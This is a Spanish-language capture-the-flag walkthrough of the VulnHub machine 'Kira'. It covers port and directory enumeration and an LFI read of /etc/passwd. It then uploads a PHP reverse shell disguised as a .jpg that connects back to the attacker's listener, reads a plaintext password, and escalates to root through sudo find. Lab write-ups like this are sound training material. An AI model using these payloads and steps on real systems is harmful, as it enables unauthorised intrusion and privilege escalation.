[VULNHUB] KiraCTF

Hoy vamos a hackear la maquina de Vulnhub llamada Kira. Podeis descargarla desde el siguiente enlace: KiraCTF

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

> nmap -A -p- 192.168.1.24                                                                                                                       
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-13 13:09 CET
Nmap scan report for bassam-aziz.home (192.168.1.24)
Host is up (0.0025s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.91 seconds
Vemos que solo tiene el puerto 80 abierto, asi que lo miramos mas en detalle con la ayuda de gobuster.

> gobuster dir -u http://192.168.1.24/ -w 
/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.tx
t 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.24/
[+] Threads:        10
[+] Wordlist:       
/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.tx
t
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/13 13:28:41 Starting gobuster
===============================================================
/uploads (Status: 301)
/server-status (Status: 403)
===============================================================
2020/11/13 13:31:26 Finished
===============================================================
Encontramos el directorio "uploads". Si entramos en el directorio http://192.168.1.24/uploads, podemos ver que hay 2 botones. El primer boton nos permite subir una imagen y el segundo boton, nos lleva a una pagina con titulo LFI, y que podemos explotar dicho LFI a traves del parametro "lang".

http://192.168.1.24/language.php?lang=../../../etc/passwd.
Viendo esto, lo que haremos sera subir una reverse shell en php, y a traves del LFI la ejecutaremos. Preparamos nuestra reverse shell.

cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
La editamos para configurar nuestra IP y puerto...

nano shell.php.jpg
Daros cuenta que para hacer el bypass de la imagen, en este caso es tan simple como renombrar a nuestra shell.php como shell.php.jpg. Una vez echo los pasos anteriores subimos el fichero shell.php.jpg. Ponemos nc a la escucha.

> nc -nlvp 1234
Y visitamos:

http://192.168.1.24/language.php?lang=../../../var/www/html/uploads/shell.php.jpg

Low Shell


Obtenemos nuestra shell :D

> nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.102] from (UNKNOWN) [192.168.1.24] 42010
Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 
UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 13:04:21 up 34 min,  1 user,  load average: 1.02, 1.02, 0.98
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
bassam   :0       :0               12:30   ?xdm?  33:07   0.00s 
/usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu 
gnome-session --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
Exploramos el sistema para ver si encontramos algo.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bassam-aziz:/var/www/html$ ls -la
total 28
drwxr-xr-x 4 root root 4096 ما� 26  2020 .
drwxr-xr-x 3 root root 4096 ما� 26  2020 ..
-rw-r--r-- 1 root root  163 ما� 26  2020 index.html
-rw-r--r-- 1 root root  287 ما� 26  2020 language.php
drwxr-xr-x 2 root root 4096 نو�  4 10:52 supersecret-for-aziz
-rw-r--r-- 1 root root  747 ما� 26  2020 upload.php
drwxrwxrwx 2 root root 4096 نو� 14 12:43 uploads
www-data@bassam-aziz:/var/www/html$ cd supersecret-for-aziz
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 نو�  4 10:52 .
drwxr-xr-x 4 root root 4096 ما� 26  2020 ..
-rw-r--r-- 1 root root   15 نو�  4 10:52 bassam-pass.txt
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
Password123!@#
Parece que encontramos el password del usuario bassam, nos logueamos!

www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su bassam
su bassam
Password: Password123!@#

user.txt



bassam@bassam-aziz:~$ cat user.txt
THM{Bassam-Is-Better_Than-KIRA}

Privilege Escalation


Miramos si podemos hacer algo con sudo.

bassam@bassam-aziz:~$ sudo -l
[sudo] password for bassam: Password123!@#
Matching Defaults entries for bassam on bassam-aziz:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User bassam may run the following commands on bassam-aziz:
    (ALL : ALL) /usr/bin/find
Vemos que podemos usar find, asi que lo utilizamos para obtener nuestra shell privilegiada!

bassam@bassam-aziz:~$ sudo find . -exec /bin/sh \; -quit
# cd /root
# ls
flag.txt
# cat flag.txt
THM{root-Is_Better-Than_All-of-THEM-31337}

End


Y con esto ya seriamos root de la maquina.